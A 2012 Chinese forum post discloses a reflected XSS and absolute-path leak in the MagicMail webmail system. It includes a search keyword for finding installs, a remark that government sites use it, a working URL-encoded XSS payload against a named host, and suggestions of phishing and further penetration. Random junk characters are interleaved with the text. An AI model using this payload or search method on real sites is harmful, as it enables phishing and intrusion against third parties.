找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1918|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞' u7 ^9 }- K9 m" [1 |  W
7 Y' `% h- I7 T) y
* X& Y0 i/ i9 K2 l/ @% G
包含  一个反射性XSS  以及  绝对路径泄漏
4 n$ l& G& r) x- J" z( V% {看了看 貌似全部是linux的。
: m  P' f7 Z$ h$ H9 j* l9 Y" V 2 _1 H* w4 C2 K# t4 H
关键字:迈捷邮件系统 by MagicMail
0 z) i/ c2 Y+ \$ C
! M0 h$ x* ?  K" ]. S3 E3 Y可以看到很多政府网站都用这个邮件系统, {: ~$ ~- T3 c6 Y4 }

  @6 D* X7 D- J$ h2 M绝对路径 http://madman.in/index.php?login_type=declare&language=) u6 A! f* D% k# m2 [+ q

# _1 v# w; F7 `" F2 r
1 Y# ]; a0 }* g$ t. g% C3 h
% Y# a3 _6 `  _- IXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
' _5 g+ f2 q8 B; g
, h( q& v; a; ?
4 N0 n/ x$ q+ |1 B4 |3 f
  f2 J7 U) `2 O  J) e. i* l虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
8 J" L; q2 ?( o, Z
6 j# h4 r; F3 h) ~  l, B修复方案:看官方补丁吧。9 |, X( v) J6 }( T/ {2 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表